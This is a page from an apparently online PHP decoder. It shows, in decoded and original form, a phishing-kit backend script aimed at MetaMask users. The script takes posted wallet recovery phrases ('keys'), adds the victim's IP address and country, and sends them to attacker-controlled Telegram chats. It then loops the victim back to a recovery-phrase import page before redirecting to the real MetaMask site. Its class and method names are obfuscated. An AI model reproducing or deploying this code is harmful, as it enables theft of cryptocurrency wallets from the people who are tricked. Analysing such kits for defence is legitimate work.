Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php include "../RouterInc.php"; $data_info = @json_decode(file_get_contents..

Decoded Output download

<?php  
  
include "../RouterInc.php";  
  
  
$data_info = @json_decode(file_get_contents("php://input"),true);  
  
class RzM3WIrA60IfseNM7DpArIxcvVWP1gKeSZEEoKfunrFAlHFUKdNdcAUwdyMEKj0iTmjuqyGY  
{  
    static $data = "---------------------------";  
    static $name = "+ " . Application . " +";  
      
    static $message;  
  
    public static function XEVEawkffIjVDhomjRX9oCAicKSr83QcreAazzK041gtlK($func)  
    {  
  
        global $mix_telegram;  
        global $card_info;  
        global $data_info;  
          
        self::$message = "" . self::$data . self::$name . self::$data . " 
";  
  
        self::$message .= " 
  +   " . $data_info["len"] - 1 . " Keys  :   " . $data_info['keys'] . "  
";  
        self::$message .= " 
" . self::$data . self::$name . self::$data . " 
";  
        self::$message .= "  
   Country : {$func->country()}   
";  
        self::$message .= "      IP Address : {$func->get_user_ip()}   
";  
        self::$message .= " 
" . self::$data . self::$name . self::$data . " 
";  
  
  
        if (!isset($_SESSION["location"]))  
        {  
            $_SESSION["location"] = 1;  
        }  
        else  
        {  
            $_SESSION["location"] += 1;  
        }  
              
          
        foreach($mix_telegram as $chatid => $token)  
        {  
            $func->send_telegram($chatid,self::$message,$token);  
      
        }  
          
    }  
}  
  
  
if(is_array($data_info))  
{  
    RzM3WIrA60IfseNM7DpArIxcvVWP1gKeSZEEoKfunrFAlHFUKdNdcAUwdyMEKj0iTmjuqyGY::XEVEawkffIjVDhomjRX9oCAicKSr83QcreAazzK041gtlK($func);  
      
    if(isset($_SESSION["location"]))  
    {  
        if ($_SESSION["location"] == 1)  
        {  
            echo '{"location" : "import-with-recovery-phrase"}';  
        }  
        else  
        {  
            echo '{"location" : "https://metamask.io/about/"}';  
            unset($_SESSION["location"]);  
        }  
          
    }  
} ?>

Did this file decode correctly?

Original Code

<?php 
 
include "../RouterInc.php"; 
 
 
$data_info = @json_decode(file_get_contents("php://input"),true); 
 
class RzM3WIrA60IfseNM7DpArIxcvVWP1gKeSZEEoKfunrFAlHFUKdNdcAUwdyMEKj0iTmjuqyGY 
{ 
    static $data = "---------------------------"; 
    static $name = "+ " . Application . " +"; 
     
    static $message; 
 
    public static function XEVEawkffIjVDhomjRX9oCAicKSr83QcreAazzK041gtlK($func) 
    { 
 
        global $mix_telegram; 
        global $card_info; 
        global $data_info; 
         
        self::$message = "" . self::$data . self::$name . self::$data . "
"; 
 
        self::$message .= "
  +   " . $data_info["len"] - 1 . " Keys  :   " . $data_info['keys'] . " 
"; 
        self::$message .= "
" . self::$data . self::$name . self::$data . "
"; 
        self::$message .= " 
   Country : {$func->country()}  
"; 
        self::$message .= "      IP Address : {$func->get_user_ip()}  
"; 
        self::$message .= "
" . self::$data . self::$name . self::$data . "
"; 
 
 
        if (!isset($_SESSION["location"])) 
        { 
            $_SESSION["location"] = 1; 
        } 
        else 
        { 
            $_SESSION["location"] += 1; 
        } 
             
         
        foreach($mix_telegram as $chatid => $token) 
        { 
            $func->send_telegram($chatid,self::$message,$token); 
     
        } 
         
    } 
} 
 
 
if(is_array($data_info)) 
{ 
    RzM3WIrA60IfseNM7DpArIxcvVWP1gKeSZEEoKfunrFAlHFUKdNdcAUwdyMEKj0iTmjuqyGY::XEVEawkffIjVDhomjRX9oCAicKSr83QcreAazzK041gtlK($func); 
     
    if(isset($_SESSION["location"])) 
    { 
        if ($_SESSION["location"] == 1) 
        { 
            echo '{"location" : "import-with-recovery-phrase"}'; 
        } 
        else 
        { 
            echo '{"location" : "https://metamask.io/about/"}'; 
            unset($_SESSION["location"]); 
        } 
         
    } 
} ?>

Function Calls

None

Variables

None

Stats

MD5 bcdfa3973f405c11549596db82981240
Eval Count 0
Decode Time 93 ms